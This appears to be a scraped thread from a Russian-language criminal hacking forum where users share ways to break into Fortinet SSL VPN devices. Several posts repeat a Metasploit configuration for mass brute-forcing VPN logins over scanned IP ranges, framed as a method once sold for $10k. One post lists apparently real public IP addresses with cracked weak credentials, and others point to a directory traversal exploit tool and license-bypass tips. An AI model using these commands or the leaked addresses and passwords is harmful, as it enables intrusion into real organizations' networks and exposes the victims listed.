Всех приветствую, занялся изучением фортиков, ищу сканеры и инструменты которые помогают експлаутировать уязвимости. Кому не тяжело , поделитесь информацией, буду очень благодарен!
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Routers Ищу инструменты для пентеста оборудования Fortinet
- Автор темы Gufi
- Дата начала
Привет
Можно брутить. Это в принципе то что продавал Bassterlord за 10k$.
msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS 'file:/home/ip10443.txt'
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 500
run
Массканом собираешь ip по портам и погнал.
GitHub - RedcentricCyber/Fortigate: Extract Useful info from SSL VPN Directory Traversal Vulnerability (FG-IR-18-384)
Extract Useful info from SSL VPN Directory Traversal Vulnerability (FG-IR-18-384) - RedcentricCyber/Fortigate
github.com
Можно брутить. Это в принципе то что продавал Bassterlord за 10k$.
msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS 'file:/home/ip10443.txt'
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 500
run
Массканом собираешь ip по портам и погнал.
качаешь фортик и ставишь на виртуалку: https://support.fortinet.com/Download/VMImages.aspx Далее, пытаешься воссоздать последнии цвеешки, но в идеале нужно еще скачать пропатченный образ и образ до патча, в иде найти разницу и понять какой именно код они пропатчили
проблема только в том , что они требуют у них купить лицензию,чтобы ссылка была доступна. Если есть у кого образ, поделитесь.
Гайд по установке:
How to run Fortinet FortiGate-VM in VirtualBox
The next VNF we will create within our lab is the Fortinet FortiGate-VM. It is a virtual firewall designed by Fortinet for use within virtual environments. Obtaining an Image After creating a profile on the Fortinet website, the FortiGate-VM can be downloaded from
nfv.dev
Это точно?
Последнее редактирование:
Образы скачать можно тут
Забавный факт в том, что я хотел написать статью про эту cve , но потом один скажем так Чудак выкинул poc и у меня отбило желание ее дописывать. Дошел до момента где я уже сравнивал патченную и не патченную версию.
А позже у меня и вовсе беда произошла с железом. Так что если хотите как студи кейс самое то. Но для начала вам так же надо будет настроить ssl-vpn на фортигейте. По поводу лицухи там 14 дней вроде как триал, хотя на китайских блогах есть способы как это обойти.
https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/83189/
Забавный факт в том, что я хотел написать статью про эту cve , но потом один скажем так Чудак выкинул poc и у меня отбило желание ее дописывать. Дошел до момента где я уже сравнивал патченную и не патченную версию.
https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/83850/post-608985
А позже у меня и вовсе беда произошла с железом. Так что если хотите как студи кейс самое то. Но для начала вам так же надо будет настроить ssl-vpn на фортигейте. По поводу лицухи там 14 дней вроде как триал, хотя на китайских блогах есть способы как это обойти.
ca
thank you
can share the users and pwd you use .Привет
GitHub - RedcentricCyber/Fortigate: Extract Useful info from SSL VPN Directory Traversal Vulnerability (FG-IR-18-384)
Extract Useful info from SSL VPN Directory Traversal Vulnerability (FG-IR-18-384) - RedcentricCyber/Fortigategithub.com
Можно брутить. Это в принципе то что продавал Bassterlord за 10k$.
msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS 'file:/home/ip10443.txt'
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 500
run
Массканом собираешь ip по портам и погнал.
thank you
Он втюхивал паблик метод, о чем сам и говорилЭто точно?
Это и есть паблик метод
Там есть еще другие модули, например: auxiliary/scanner/http/cisco_ssl_vpn
Держи бро, пользуйся бесплатно)
Сначала только надо запустить базу данных Metasploit - sudo msfdb init
потом запускаешь скан/брут
по окончании вводишь - creds
и получаешь сбрученные креды с IP
я особо не вдавался в эту тему, просто попробовал ради интереса что там.
Пробовал с такими кредами:
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
24.37.66.162 24.37.66.162 10443/tcp (Fortinet SSL VPN) test test Password
24.37.161.222 24.37.66.162 10443/tcp (Fortinet SSL VPN) test test Password
24.37.170.246 24.37.170.246 10443/tcp (Fortinet SSL VPN) test 123456 Password
24.37.174.26 24.37.174.26 10443/tcp (Fortinet SSL VPN) users 123456789 Password
24.87.156.71 24.87.156.71 10443/tcp (Fortinet SSL VPN) users Pon521 Password
24.109.140.234 24.37.66.162 10443/tcp (Fortinet SSL VPN) test test Password
24.109.165.82 24.37.66.162 10443/tcp (Fortinet SSL VPN) test test Password
24.212.110.155 24.37.66.162 10443/tcp (Fortinet SSL VPN) test test Password
72.12.166.147 24.37.66.162 10443/tcp (Fortinet SSL VPN) test test Password
142.154.222.106 142.154.222.106 443/tcp (Fortinet SSL VPN) test test Password
and shodan for grabbing!! ? btw thanks a lot.Hello
GitHub - RedcentricCyber/Fortigate: Extract Useful info from SSL VPN Directory Traversal Vulnerability (FG-IR-18-384)
Extract Useful info from SSL VPN Directory Traversal Vulnerability (FG-IR-18-384) - RedcentricCyber/Fortigategithub.com
You can screw. This is basically what Bassterlord was selling for $10k.
msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS 'file:/home/ip10443.txt'
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 500
run
Masscan collect ip on ports and drove.